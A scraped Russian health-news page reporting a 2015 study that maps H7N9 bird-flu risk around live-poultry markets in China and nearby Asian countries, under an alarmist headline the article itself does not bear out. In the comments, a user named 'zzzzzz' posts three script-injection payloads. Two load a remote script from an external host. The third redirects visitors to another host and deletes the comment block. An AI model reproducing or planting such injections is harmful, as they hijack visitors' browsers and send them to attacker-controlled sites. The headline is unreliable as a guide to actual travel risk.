Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Собрались в отпуск? В эти...  >>  Собрались в отпуск? В этих странах вы обязательно заболеете!
 
Обратная связь
 

Собрались в отпуск? В этих странах вы обязательно заболеете!

Размер шрифта
28 апреля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Согласно недавнему исследованию, опубликованному в журнале NatureCommunications, штамм вируса птичьего гриппа, который до сих пор встречался только в Китае, имеет все шансы распространиться и на соседние регионы: Индию, Бангладеш, Вьетнам, Индонезию и Филиппины. Так стоит ли отправляться туда в путешествие?

Собрались в отпуск? В этих странах вы обязательно заболеете!

Ученые из Франции, Великобритании и Китая проанализировали данные о расположении и распространенности рынков живой птицы и птицеферм на территории Китая. Они обнаружили, что болезнь чаще всего возникает именно в тех регионах, в которых располагаются места торговли живыми птицами. Инфекция, вызванная штаммом птичьего гриппа H7N9, была выявлена у 429 человек, причем в более чем 100 случаях болезнь закончилась летальным исходом.

Ученые определили регионы, в которых находятся крупные скопления рынков живой птицы. К ним относятся Бангладеш, Индия, Вьетнам, а также отдельные области в Индонезии и Филиппины. Именно здесь наиболее высока вероятность распространения вируса птичьего гриппа. «Полученные данные помогут нам вовремя принять меры по контролю над распространением этого заболевания», – считает Мариус Гилберт, эксперт в области эпидемиологии и ведущий автор исследования.

Гилберт с коллегами разработали специальные «карты риска» для штамма H7N9, благодаря которым можно предположить, где именно проявит себя инфекция в следующий раз. Стоит отметить, что птичий грипп передается чаще всего при контакте с зараженными птицами, а вовсе не от человека к человеку. В отличие от других штаммов, H7N9 практически не вызывает симптомов у птиц, из-за чего вирус еще сложнее обнаружить, а значит, сложнее предотвратить инфицирование.

«Использование таких карт поможет вычислить регионы, в которых риск возникновения болезни наиболее высок. Это значит, что власти смогут быстрее отреагировать и вовремя принять меры по ограничению распространения вируса», – рассказывает Тим Робинсон, соавтор работы. Хотя ученым удалось установить, что одним из главных факторов распространения птичьего гриппа являются рынки живой птицы, они также обнаружили, что H7N9 до сих пор отсутствовал на рынках на северо-востоке Китая.

Результаты исследования говорят о том, что такие факторы как количество птиц на рынке и соблюдение санитарных норм могут повлиять на распространение заболевания. Однако несмотря на соблюдение строгих правил безопасности на территории Китая, вирус продолжает медленно распространяться на новые регионы.

Благодаря специальным новым картам у ученых появилась возможность определить местонахождение и плотность распределения миллиардов голов домашней птицы, крупного рогатого скота, свиней, коз и других домашних и сельскохозяйственных животных по всему миру вплоть до квадратного километра. Робинсон отметил, что такое картирование популяций скота особенно важно именно в Азии, где растет спрос на продукты животного происхождения и животноводство является быстро развивающейся отраслью.

Так что если хотите путешествовать по экзотическим странам и при этом быть в безопасности, вам следует обязательно поинтересоваться, какие болезни распространены в том регионе, куда вы направляетесь, и заранее позаботиться о профилактике. И, разумеется, не стоит забывать о правилах личной гигиены.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

29 апреля 2015 в 18:07

Цитировать   |   Пожаловаться

Да уж, эти развивающиеся страны не отличаются высокими санитарными нормами. В тёплом климате большинство вирусов быстро распространяется. А кто-нибудь слышал об этой инфекции, вызванной штаммом птичьего гриппа, на другой стороне планеты? В странах латинской Америки. Тоже развивающиеся страны. И находятся в районе экватора, где жаркий климат.

2 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:12

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
ПРОфессиональный и эффективный уход за полостью рта   Мифы о личной гигиене. Нужно ли так часто мыться?   Как тебе не заболеть   Мой до дыр! Неделя мытья рук  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Можно ли вылечить грибок без врача?
Как действительно избавиться от всех микробов. Часть 1
Можно ли жить с бронхитом?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.